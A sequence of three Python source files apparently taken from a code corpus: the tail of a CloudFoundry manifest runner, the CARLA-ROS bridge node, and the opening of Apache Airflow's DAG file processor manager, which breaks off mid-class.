"buildpacks": [],
"command": '',
"disk_quota": '2048M',
"docker": {},
"health-check-http-endpoint": '/',
"health-check-type": "port",
"instances": 1,
"memory": "1024M",
"metadata": {},
"no-route": False,
"path": '.',
"processes": [],
"random-route": False,
"routes": [],
"sidecars": [],
"stack": 'cflinuxfs3',
"timeout": 60,
"env": {},
"services": [],
}
def __init__(self, manifest, variables=None, logger=None):
if not logger:
logger = logging.getLogger(self.__class__.__name__)
self.logger = logger
self.logger.debug("Reading Cloudfoundry manifest: %s" % manifest)
try:
with open(manifest) as file:
self.manifest = yaml.load(file, Loader=yaml.SafeLoader)
except IOError as e:
self.logger.error("Cannot read CF manifest. %s" % (str(e)))
raise
if variables:
self.logger.debug("Trying to read variables manifest: %s" % variables)
try:
with open(variables) as file:
self.variables = yaml.load(file, Loader=yaml.SafeLoader)
except IOError as e:
self.logger.debug("Skipping, not found %s" % (variables))
self.variables = {}
else:
self.variables = {}
def get_version(self):
try:
return self.manifest['version']
except:
return 1
def _interpolate(self, app, key):
if not key in self.AppParamsDefaults.keys():
raise ValueError("Key '%s' is unknown in CF manifest reference" % key)
try:
# quick and dirty alg, but works :-)
result = app[key]
for k, v in self.variables.items():
rpl = "((%s))" % k
if type(result) is list:
new = []
for i in result:
if isinstance(i, str):
new.append(i.replace(rpl, str(v)))
elif isinstance(i, dict):
# routes [{route:blabla}]
for nk, nv in i.items():
if isinstance(nv, str):
i[nk] = nv.replace(rpl, str(v))
new.append(i)
else:
new.append(i)
result = new
elif type(result) is dict:
for nk, nv in result.item():
if isinstance(nv, str):
result[nk] = nv.replace(rpl, str(v))
elif type(result) is str:
result = result.replace(rpl, str(v))
return result
except Exception as e:
return self.AppParamsDefaults[key]
def list_apps(self):
result = []
for app in self.manifest['applications']:
result.append(app['name'])
return result
def get_app_params(self, name):
for app in self.manifest['applications']:
if app['name'] == name:
params = {}
for p in self.AppParamsDefaults.keys():
params[p] = self._interpolate(app, p)
return params
raise ValueError("Application '%s' not found in manifest" % name)
class CFRunner(object):
def __init__(self, homedir, cfmanifest, user="", variables=None, logger=None):
# homedir = /var/vcap
# buildpacksdir = directory to download/process buildpacks
# cachedir = directory used by buildpacks for caching their stuff
# contextdir = directory where "cf push" runs
# manifest = path to the CF manifest file
if not logger:
logger = logging.getLogger(self.__class__.__name__)
self.logger = logger
self.homedir = homedir
self.user = user
self.appdir = os.path.join(homedir, 'app')
self.depsdir = os.path.join(homedir, 'deps')
self.initd = os.path.join(homedir, 'init.d')
cfmanifestpath = os.path.join(self.appdir, cfmanifest)
self.logger.debug("Starting CF runner process: homedir=%s, appdir=%s, manifest=%s" % (homedir, self.appdir, cfmanifestpath))
try:
self.manifest = CFManifest(cfmanifestpath, variables, logger)
except Exception as e:
raise
try:
for app in self.manifest.list_apps():
self.logger.debug("Found application %s in manifest file" % (app))
except KeyError as e:
self.logger.error("CloudFoundry manifest is incomplete: %s" % (str(e)))
raise
def get_internal_ip(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('1.1.1.1', 53))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
def get_default_vcap_application(self, name, app_manifest):
uris = os.getenv('APP_URIS', 'app.cf.local').split(',')
# remove empty strings
uris = [i for i in uris if i]
for r in app_manifest['routes']:
try:
uris.append(r['route'])
except:
pass
app_name = os.getenv('APP_NAME', name)
if not app_name:
app_name = name
vcap_app = dict(
instance_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, app_name)),
instance_index = '0',
cf_api = os.getenv('CF_API', 'https://api.cf.local'),
limits = {
"fds": 16384,
"mem": app_manifest['memory'],
"disk": app_manifest['disk_quota']
},
users = 'null',
name = app_name,
application_name = app_name,
application_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, app_name)),
version = os.getenv('APP_VERSION', 'latest'),
application_version = os.getenv('APP_VERSION', 'latest'),
uris = uris,
application_uris = uris,
space_name = os.getenv('CF_SPACE', 'null'),
space_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, os.getenv('CF_SPACE', 'null'))),
organization_id = os.getenv('CF_ORG', 'null'),
organization_name = str(uuid.uuid5(uuid.NAMESPACE_DNS, os.getenv('CF_ORG', 'null')))
)
return json.dumps(vcap_app)
def get_default_instance_ports(self, name, app_manifest):
try:
port = int(os.getenv('APP_PORT', '8080'))
except:
port = 8080
instance_ports = [
{
"external": 80,
"internal": port,
},
]
return json.dumps(instance_ports)
def get_default_running_vars(self, name, app_manifest):
env_vars = {}
default_running_vars = dict(
MEMORY_LIMIT = app_manifest['memory'],
PORT = os.getenv('APP_PORT', '8080'),
DATABASE_URL = '',
INSTANCE_INDEX = '0',
INSTANCE_GUID = str(uuid.uuid5(uuid.NAMESPACE_DNS, name)),
CF_INSTANCE_GUID = str(uuid.uuid5(uuid.NAMESPACE_DNS, name)),
CF_INSTANCE_INDEX = '0',
CF_INSTANCE_IP = self.get_internal_ip(),
CF_INSTANCE_PORT = os.getenv('APP_PORT', '8080'),
CF_INSTANCE_ADDR = self.get_internal_ip() + ':' + os.getenv('APP_PORT', '8080'),
CF_INSTANCE_INTERNAL_IP = self.get_internal_ip(),
CF_INSTANCE_PORTS = self.get_default_instance_ports(name, app_manifest),
VCAP_APPLICATION = self.get_default_vcap_application(name, app_manifest),
VCAP_PLATFORM_OPTIONS = '{}',
VCAP_SERVICES = os.getenv('CF_VCAP_SERVICES', '{}'),
)
for k, v in default_running_vars.items():
if k not in os.environ:
self.logger.debug("Providing running environment variable: %s=%s" % (k, v))
env_vars[k] = v
else:
self.logger.debug("Running environment variable already provided: %s=%s" % (k, os.environ[k]))
env_vars[k] = os.environ[k]
return env_vars
def get_keys_values_from_file(self, f):
result = {}
if os.path.isfile(f):
with open(f) as af:
for line in af:
name, var = line.partition("=")[::2]
result[name.strip()] = var.strip().strip('"')
return result
def get_value_from_file(self, f):
result = ""
with open(f) as af:
result = af.read()
return result
def get_k8s_running_vars(self, name, app_manifest, k8s_cf_env):
# Exported in k8s_cf_env using downward api
# https://kubernetes.io/docs/tasks/inject-data-application/downward-api-volume-expose-pod-information/
if not os.path.isdir(k8s_cf_env):
return
annotations = self.get_keys_values_from_file(os.path.join(k8s_cf_env, "annotations"))
labels = self.get_keys_values_from_file(os.path.join(k8s_cf_env, "labels"))
try:
# Memory limit comes from API in M
memory_limit = self.get_value_from_file(os.path.join(k8s_cf_env, "MEMORY_LIMIT"))
except Exception as e:
self.logger.error("Unable to read Downward-api file: %s. Falling back to default value." % e)
# memory_limit = app_manifest['memory']
memory_limit = "1024"
try:
cpu_limit = self.get_value_from_file(os.path.join(k8s_cf_env, "CPU_LIMIT"))
except Exception as e:
self.logger.error("Unable to read Downward-api file: %s. Falling back to 1 CPU." % e)
cpu_limit = "1"
try:
uid = self.get_value_from_file(os.path.join(k8s_cf_env, "INSTANCE_GUID"))
except Exception as e:
self.logger.error("Unable to read Downward-api file: %s. Generating random UUID" % e)
uid = str(uuid.uuid5(uuid.NAMESPACE_DNS, name))
try:
instance_index = labels["statefulset.kubernetes.io/pod-name"].rsplit("-", 1)[1]
except Exception as e:
self.logger.error("Unable calculate instance index: %s. Setting to 0" % e)
instance_index = '0'
env_vars = {}
default_running_vars = dict(
PORT = os.getenv('APP_PORT', '8080'),
CPU_LIMIT = cpu_limit,
MEMORY_LIMIT = memory_limit+"M",
INSTANCE_INDEX = instance_index,
INSTANCE_GUID = uid,
CF_INSTANCE_GUID = uid,
CF_INSTANCE_INDEX = instance_index,
CF_INSTANCE_IP = self.get_internal_ip(),
CF_INSTANCE_PORT = os.getenv('APP_PORT', '8080'),
CF_INSTANCE_ADDR = self.get_internal_ip() + ':' + os.getenv('APP_PORT', '8080'),
CF_INSTANCE_INTERNAL_IP = self.get_internal_ip(),
CF_INSTANCE_PORTS = self.get_default_instance_ports(name, app_manifest),
)
app_name = os.getenv('APP_NAME', name)
if not app_name:
app_name = name
uris = []
for k, value in annotations.items():
if k.startswith("kubefoundry/route"):
uris.append(value)
space = annotations.get("kubefoundry/space", os.getenv('CF_SPACE', 'null'))
org = annotations.get("kubefoundry/org", os.getenv('CF_ORG', 'null'))
vcap_app = dict(
cf_api = os.getenv('CF_API', 'https://kubefoundry.local'),
limits = {
"fds": 16384,
"mem": int(memory_limit) * 1048576,
"disk": 4000 * 1048576,
},
users = 'null',
name = app_name,
instance_id = uid,
instance_index = instance_index,
application_name = app_name,
application_id = annotations.get("kubefoundry/appuid.0", uid),
version = annotations.get("kubefoundry/version.0", os.getenv('APP_VERSION', 'latest')),
application_version = annotations.get("kubefoundry/version.0", os.getenv('APP_VERSION', 'latest')),
uris = uris,
application_uris = uris,
space_name = space,
space_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, space)),
organization_name = org,
organization_id = str(uuid.uuid5(uuid.NAMESPACE_DNS, org))
)
default_running_vars['VCAP_APPLICATION'] = json.dumps(vcap_app)
for k, v in default_running_vars.items():
if k not in os.environ:
self.logger.debug("Providing running environment variable: %s=%s" % (k, v))
env_vars[k] = v
else:
self.logger.debug("Running environment variable already provided: %s=%s" % (k, os.environ[k]))
env_vars[k] = os.environ[k]
return env_vars
def staging_info(self):
staging_info_file = os.path.join(self.homedir, "staging_info.yml")
self.logger.debug("Reading %s" % staging_info_file)
try:
with open(staging_info_file) as file:
staging_info = yaml.load(file, Loader=yaml.SafeLoader)
except IOError as e:
self.logger.error("Cannot read CF staging_info.yml. %s" % (str(e)))
raise
return staging_info
def run(self, exit_if_any=True, read_manifest_env=True, fake_cf_env=True, kubefoundry_env_path=''):
runner = Runner(self.appdir, {}, self.user, self.logger)
for f in Path(self.initd).glob('*.sh'):
m = re.match(r"(\d+_\d+|\d+)_(.*)\.sh$", f.name)
if m is not None:
app_name = m.group(2)
manifest = self.manifest.get_app_params(app_name)
cfenv = {}
if fake_cf_env:
self.logger.debug("Application running in local container, generating fake metadata ....")
cfenv = self.get_default_running_vars(app_name, manifest)
if kubefoundry_env_path:
self.logger.debug("Application running in Kubernetes, trying to get metadata ....")
cfenv = self.get_k8s_running_vars(app_name, manifest, kubefoundry_env_path)
manifestenv = {}
if read_manifest_env:
manifestenv = manifest['env']
cmd = [ str(f) ]
if self.logger.level == logging.DEBUG:
cmd.append('--debug')
env = {**cfenv, **manifestenv}
runner.task(f.stem, cmd, env)
output = runner.run(True)
rcall = 0
for name, result in output.items():
cmd, pid, start, end, rc = result
self.logger.info("Application %s (pid=%s) exited with code %s" % (name, pid, rc))
rcall += rc
return rcall
def main():
logger = logging.getLogger()
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
# Argument parsing
epilog = __purpose__ + '\n'
epilog += __version__ + ', ' + __year__ + ' ' + __author__ + ' ' + __email__
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, description=__doc__, epilog=epilog)
parser.add_argument('-d', '--debug', action='store_true', default=False, help='Enable debug mode')
parser.add_argument('-e', '--manifest-env', action='store_true', default=False, help='Use manifest environment variables when app runs')
parser.add_argument('-f', '--cf-fake-env', action='store_true', default=False, help='Simulate fake CF environment variables')
parser.add_argument('-k', '--cf-k8s-env', metavar='/path/to/volume', help='Generate CF environment variables from K8S volume info')
parser.add_argument('-m', '--manifest', metavar='manifest.yml', default="manifest.yml", help='CloudFoundry application manifest file')
parser.add_argument('-u', '--user', default="vcap", help='Run applicaion(s) as this user')
parser.add_argument('-v', '--manifest-vars', metavar='vars.yml', default="vars.yml", help='CloudFoundry variables file for manifest')
parser.add_argument('-H', '--home', default="/home/vcap", help='Cloudfoundry VCAP home folder')
args = parser.parse_args()
debugvar = os.environ.get("DEBUG", '')
if args.debug or debugvar:
logger.setLevel(logging.DEBUG)
handler.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
handler.setLevel(logging.INFO)
try:
cfmanifest = os.environ.get("CF_MANIFEST", args.manifest)
cfmanifest_vars = os.environ.get("CF_VARS", args.manifest_vars)
runner = CFRunner(args.home, cfmanifest, args.user, cfmanifest_vars, logger)
rc = runner.run(True, args.manifest_env, args.cf_fake_env, args.cf_k8s_env)
sys.exit(rc)
except Exception as e:
print("ERROR: %s" % str(e), file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main() |
bridge.py | #!/usr/bin/env python
#
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Rosbridge class:
Class that handle communication between CARLA and ROS
"""
import os
import pkg_resources
try:
import queue
except ImportError:
import Queue as queue
import sys
from distutils.version import LooseVersion
from threading import Thread, Lock, Event
import carla
import ros_compatibility as roscomp
from ros_compatibility.node import CompatibleNode
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.actor_factory import ActorFactory
from carla_ros_bridge.carla_status_publisher import CarlaStatusPublisher
from carla_ros_bridge.debug_helper import DebugHelper
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.world_info import WorldInfo
from carla_msgs.msg import CarlaControl, CarlaWeatherParameters
from carla_msgs.srv import SpawnObject, DestroyObject, GetBlueprints
from rosgraph_msgs.msg import Clock
class CarlaRosBridge(CompatibleNode):
"""
Carla Ros bridge
"""
with open(os.path.join(os.path.dirname(__file__), "CARLA_VERSION")) as f:
CARLA_VERSION = f.read()[:-1]
# in synchronous mode, if synchronous_mode_wait_for_vehicle_control_command is True,
# wait for this time until a next tick is triggered.
VEHICLE_CONTROL_TIMEOUT = 1.
def __init__(self):
"""
Constructor
:param carla_world: carla world object
:type carla_world: carla.World
:param params: dict of parameters, see settings.yaml
:type params: dict
"""
super(CarlaRosBridge, self).__init__("ros_bridge_node")
# pylint: disable=attribute-defined-outside-init
def initialize_bridge(self, carla_world, params):
"""
Initialize the bridge
"""
self.parameters = params
self.carla_world = carla_world
self.ros_timestamp = roscomp.ros_timestamp()
self.callback_group = roscomp.callback_groups.ReentrantCallbackGroup()
self.synchronous_mode_update_thread = None
self.shutdown = Event()
self.carla_settings = carla_world.get_settings()
if not self.parameters["passive"]:
# workaround: settings can only applied within non-sync mode
if self.carla_settings.synchronous_mode:
self.carla_settings.synchronous_mode = False
carla_world.apply_settings(self.carla_settings)
self.loginfo("synchronous_mode: {}".format(
self.parameters["synchronous_mode"]))
self.carla_settings.synchronous_mode = self.parameters["synchronous_mode"]
self.loginfo("fixed_delta_seconds: {}".format(
self.parameters["fixed_delta_seconds"]))
self.carla_settings.fixed_delta_seconds = self.parameters["fixed_delta_seconds"]
carla_world.apply_settings(self.carla_settings)
self.loginfo("Parameters:")
for key in self.parameters:
self.loginfo(" {}: {}".format(key, self.parameters[key]))
# active sync mode in the ros bridge only if CARLA world is configured in sync mode and
# passive mode is not enabled.
self.sync_mode = self.carla_settings.synchronous_mode and not self.parameters["passive"]
if self.carla_settings.synchronous_mode and self.parameters["passive"]:
self.loginfo(
"Passive mode is enabled and CARLA world is configured in synchronous mode. This configuration requires another client ticking the CARLA world.")
self.carla_control_queue = queue.Queue()
# actor factory
self.actor_factory = ActorFactory(self, carla_world, self.sync_mode)
# add world info
self.world_info = WorldInfo(carla_world=self.carla_world, node=self)
# add debug helper
self.debug_helper = DebugHelper(carla_world.debug, self)
# Communication topics
self.clock_publisher = self.new_publisher(Clock, 'clock', 10)
self.status_publisher = CarlaStatusPublisher(
self.carla_settings.synchronous_mode,
self.carla_settings.fixed_delta_seconds,
self)
# for waiting for ego vehicle control commands in synchronous mode,
# their ids are maintained in a list.
# Before tick(), the list is filled and the loop waits until the list is empty.
self._all_vehicle_control_commands_received = Event()
self._expected_ego_vehicle_control_command_ids = []
self._expected_ego_vehicle_control_command_ids_lock = Lock()
if self.sync_mode:
self.carla_run_state = CarlaControl.PLAY
self.carla_control_subscriber = \
self.new_subscription(CarlaControl, "/carla/control",
lambda control: self.carla_control_queue.put(control.command),
qos_profile=10, callback_group=self.callback_group)
self.synchronous_mode_update_thread = Thread(
target=self._synchronous_mode_update)
self.synchronous_mode_update_thread.start()
else:
self.timestamp_last_run = 0.0
self.actor_factory.start()
# register callback to update actors
self.on_tick_id = self.carla_world.on_tick(self._carla_time_tick)
# services configuration.
self._registered_actors = []
self.spawn_object_service = self.new_service(SpawnObject, "/carla/spawn_object",
self.spawn_object)
self.destroy_object_service = self.new_service(DestroyObject, "/carla/destroy_object",
self.destroy_object)
self.get_blueprints_service = self.new_service(GetBlueprints, "/carla/get_blueprints",
self.get_blueprints, callback_group=self.callback_group)
self.carla_weather_subscriber = \
self.new_subscription(CarlaWeatherParameters, "/carla/weather_control",
self.on_weather_changed, qos_profile=10, callback_group=self.callback_group)
def spawn_object(self, req, response=None):
response = roscomp.get_service_response(SpawnObject)
if not self.shutdown.is_set():
try:
id_ = self.actor_factory.spawn_actor(req)
self._registered_actors.append(id_)
response.id = id_
except Exception as e:
self.logwarn("Error spawning object '{}': {}".format(req.type, e))
response.id = -1
response.error_string = str(e)
else:
response.id = -1
response.error_string = 'Bridge is shutting down, object will not be spawned.'
return response
def destroy_object(self, req, response=None):
response = roscomp.get_service_response(DestroyObject)
destroyed_actors = self.actor_factory.destroy_actor(req.id)
response.success = bool(destroyed_actors)
for actor in destroyed_actors:
if actor in self._registered_actors:
self._registered_actors.remove(actor)
return response
def get_blueprints(self, req):
response = roscomp.get_service_response(GetBlueprints)
if req.filter:
bp_filter = req.filter
else:
bp_filter = "*"
response.blueprints = [
bp.id for bp in self.carla_world.get_blueprint_library().filter(bp_filter)]
response.blueprints.extend(self.actor_factory.get_pseudo_sensor_types())
response.blueprints.sort()
return response
def on_weather_changed(self, weather_parameters):
"""
Callback on new weather parameters
:return:
"""
if not self.carla_world:
return
self.loginfo("Applying weather parameters...")
weather = carla.WeatherParameters()
weather.cloudiness = weather_parameters.cloudiness
weather.precipitation = weather_parameters.precipitation
weather.precipitation_deposits = weather_parameters.precipitation_deposits
weather.wind_intensity = weather_parameters.wind_intensity
weather.fog_density = weather_parameters.fog_density
weather.fog_distance = weather_parameters.fog_distance
weather.wetness = weather_parameters.wetness
weather.sun_azimuth_angle = weather_parameters.sun_azimuth_angle
weather.sun_altitude_angle = weather_parameters.sun_altitude_angle
self.carla_world.set_weather(weather)
def process_run_state(self):
"""
process state changes
"""
command = None
# get last command
while not self.carla_control_queue.empty():
command = self.carla_control_queue.get()
while command is not None and roscomp.ok():
self.carla_run_state = command
if self.carla_run_state == CarlaControl.PAUSE:
# wait for next command
self.loginfo("State set to PAUSED")
self.status_publisher.set_synchronous_mode_running(False)
command = self.carla_control_queue.get()
elif self.carla_run_state == CarlaControl.PLAY:
self.loginfo("State set to PLAY")
self.status_publisher.set_synchronous_mode_running(True)
return
elif self.carla_run_state == CarlaControl.STEP_ONCE:
self.loginfo("Execute single step.")
self.status_publisher.set_synchronous_mode_running(True)
self.carla_control_queue.put(CarlaControl.PAUSE)
return
def _synchronous_mode_update(self):
"""
execution loop for synchronous mode
"""
while not self.shutdown.is_set() and roscomp.ok():
self.process_run_state()
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# fill list of available ego vehicles
self._expected_ego_vehicle_control_command_ids = []
with self._expected_ego_vehicle_control_command_ids_lock:
for actor_id, actor in self.actor_factory.actors.items():
if isinstance(actor, EgoVehicle):
self._expected_ego_vehicle_control_command_ids.append(
actor_id)
self.actor_factory.update_available_objects()
frame = self.carla_world.tick()
world_snapshot = self.carla_world.get_snapshot()
self.status_publisher.set_frame(frame)
self.update_clock(world_snapshot.timestamp)
self.logdebug("Tick for frame {} returned. Waiting for sensor data...".format(
frame))
self._update(frame, world_snapshot.timestamp.elapsed_seconds)
self.logdebug("Waiting for sensor data finished.")
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# wait for all ego vehicles to send a vehicle control command
if self._expected_ego_vehicle_control_command_ids:
if not self._all_vehicle_control_commands_received.wait(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT):
self.logwarn("Timeout ({}s) while waiting for vehicle control commands. "
"Missing command from actor ids {}".format(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT,
self._expected_ego_vehicle_control_command_ids))
self._all_vehicle_control_commands_received.clear()
def _carla_time_tick(self, carla_snapshot):
"""
Private callback registered at carla.World.on_tick()
to trigger cyclic updates.
After successful locking the update mutex
(only perform trylock to respect bridge processing time)
the clock and the children are updated.
Finally the ROS messages collected to be published are sent out.
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if not self.shutdown.is_set():
if self.timestamp_last_run < carla_snapshot.timestamp.elapsed_seconds:
self.timestamp_last_run = carla_snapshot.timestamp.elapsed_seconds
self.update_clock(carla_snapshot.timestamp)
self.status_publisher.set_frame(carla_snapshot.frame)
self._update(carla_snapshot.frame,
carla_snapshot.timestamp.elapsed_seconds)
def _update(self, frame_id, timestamp):
"""
update all actors
:return:
"""
self.world_info.update(frame_id, timestamp)
self.actor_factory.update_actor_states(frame_id, timestamp)
def _ego_vehicle_control_applied_callback(self, ego_vehicle_id):
if not self.sync_mode or \
not self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
return
with self._expected_ego_vehicle_control_command_ids_lock:
if ego_vehicle_id in self._expected_ego_vehicle_control_command_ids:
self._expected_ego_vehicle_control_command_ids.remove(
ego_vehicle_id)
else:
self.logwarn(
"Unexpected vehicle control command received from {}".format(ego_vehicle_id))
if not self._expected_ego_vehicle_control_command_ids:
self._all_vehicle_control_commands_received.set()
def update_clock(self, carla_timestamp):
"""
perform the update of the clock
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if roscomp.ok():
self.ros_timestamp = roscomp.ros_timestamp(carla_timestamp.elapsed_seconds, from_sec=True)
self.clock_publisher.publish(Clock(clock=self.ros_timestamp))
def destroy(self):
"""
Function to destroy this object.
:return:
"""
self.loginfo("Shutting down...")
self.shutdown.set()
if not self.sync_mode:
if self.on_tick_id:
self.carla_world.remove_on_tick(self.on_tick_id)
self.actor_factory.thread.join()
else:
self.synchronous_mode_update_thread.join()
self.loginfo("Object update finished.")
self.debug_helper.destroy()
self.status_publisher.destroy()
self.destroy_service(self.spawn_object_service)
self.destroy_service(self.destroy_object_service)
self.destroy_subscription(self.carla_weather_subscriber)
self.carla_control_queue.put(CarlaControl.STEP_ONCE)
for uid in self._registered_actors:
self.actor_factory.destroy_actor(uid)
self.actor_factory.update_available_objects()
self.actor_factory.clear()
super(CarlaRosBridge, self).destroy()
def main(args=None):
"""
main function for carla simulator ROS bridge
maintaining the communication client and the CarlaBridge object
"""
roscomp.init("bridge", args=args)
carla_bridge = None
carla_world = None
carla_client = None
executor = None
parameters = {}
executor = roscomp.executors.MultiThreadedExecutor()
carla_bridge = CarlaRosBridge()
executor.add_node(carla_bridge)
roscomp.on_shutdown(carla_bridge.destroy)
parameters['host'] = carla_bridge.get_param('host', 'localhost')
parameters['port'] = carla_bridge.get_param('port', 2000)
parameters['timeout'] = carla_bridge.get_param('timeout', 2)
parameters['passive'] = carla_bridge.get_param('passive', False)
parameters['synchronous_mode'] = carla_bridge.get_param('synchronous_mode', True)
parameters['synchronous_mode_wait_for_vehicle_control_command'] = carla_bridge.get_param(
'synchronous_mode_wait_for_vehicle_control_command', False)
parameters['fixed_delta_seconds'] = carla_bridge.get_param('fixed_delta_seconds',
0.05)
parameters['register_all_sensors'] = carla_bridge.get_param('register_all_sensors', True)
parameters['town'] = carla_bridge.get_param('town', 'Town01')
role_name = carla_bridge.get_param('ego_vehicle_role_name',
["hero", "ego_vehicle", "hero1", "hero2", "hero3"])
parameters["ego_vehicle"] = {"role_name": role_name}
carla_bridge.loginfo("Trying to connect to {host}:{port}".format(
host=parameters['host'], port=parameters['port']))
try:
carla_client = carla.Client(
host=parameters['host'],
port=parameters['port'])
carla_client.set_timeout(parameters['timeout'])
# check carla version
# dist = pkg_resources.get_distribution("carla")
# if LooseVersion(dist.version) != LooseVersion(CarlaRosBridge.CARLA_VERSION):
# carla_bridge.logfatal("CARLA python module version {} required. Found: {}".format(
# CarlaRosBridge.CARLA_VERSION, dist.version))
# sys.exit(1)
# if LooseVersion(carla_client.get_server_version()) != \
# LooseVersion(carla_client.get_client_version()):
# carla_bridge.logwarn(
# "Version mismatch detected: You are trying to connect to a simulator that might be incompatible with this API. Client API version: {}. Simulator API version: {}"
# .format(carla_client.get_client_version(),
# carla_client.get_server_version()))
carla_world = carla_client.get_world()
if "town" in parameters and not parameters['passive']:
if parameters["town"].endswith(".xodr"):
carla_bridge.loginfo(
"Loading opendrive world from file '{}'".format(parameters["town"]))
with open(parameters["town"]) as od_file:
data = od_file.read()
carla_world = carla_client.generate_opendrive_world(str(data))
else:
if carla_world.get_map().name != parameters["town"]:
carla_bridge.loginfo("Loading town '{}' (previous: '{}').".format(
parameters["town"], carla_world.get_map().name))
carla_world = carla_client.load_world(parameters["town"])
carla_world.tick()
carla_bridge.initialize_bridge(carla_client.get_world(), parameters)
carla_bridge.spin()
except (IOError, RuntimeError) as e:
carla_bridge.logerr("Error: {}".format(e))
except KeyboardInterrupt:
pass
finally:
roscomp.shutdown()
del carla_world
del carla_client
if __name__ == "__main__":
main()
|
manager.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
import zipfile
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy.orm import Session
from tabulate import tabulate
import airflow.models
from airflow.callbacks.callback_requests import CallbackRequest
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, DbCallbackRequest, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths, might_contain_dag
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import (
kill_child_processes_by_pids,
reap_process_group,
set_new_process_group,
)
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[timedelta]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: Whether to start agent in async mode
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def get_callbacks_pipe(self) -> MultiprocessingConnection:
